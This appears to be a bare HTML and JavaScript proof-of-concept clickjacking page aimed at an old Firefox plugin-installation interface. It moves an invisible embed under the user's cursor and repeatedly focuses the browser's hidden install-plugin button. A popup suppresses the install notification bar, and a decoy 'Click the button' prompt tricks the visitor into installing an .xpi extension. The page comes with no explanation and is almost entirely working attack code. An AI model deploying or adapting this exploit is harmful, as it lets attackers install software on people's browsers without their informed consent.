<html>
<head>
<script>

function move(e){
	document.getElementsByTagName('embed')[0].style.left=e.pageX-30+'px';
	document.getElementsByTagName('embed')[0].style.top=e.pageY-30+'px';
}

function foc(){
	if(document.activeElement=='[object XULElement]'){
		xul=document.activeElement;
		window.onmousemove='';
		document.getElementsByTagName('embed')[0].width=0;
		document.getElementsByTagName('div')[0].innerHTML='Dummy counter: 10';
		clearInterval(a);
		setInterval("xul.getElementsByClassName('installStatus')[0].getElementsByClassName('msg msgInstallPlugin')[0].childNodes[0].focus();",100);
	}
}

a=setInterval('foc()',100);

</script>
</head>

<body onmousemove='move(event)'>
<embed src="data:a/b," style="position:absolute;opacity:0.0;" pluginspage="https://www.torproject.org/dist/torbutton/torbutton-current.xpi">

<script>
//hide the plugin install yellow bar
window.open("javascript:document.write('Thanks for your support!')",'','width=200,height=50');
</script>

<br><br><br>
<div>Click <input type=button value='the button'>.</div>
</body>
</html>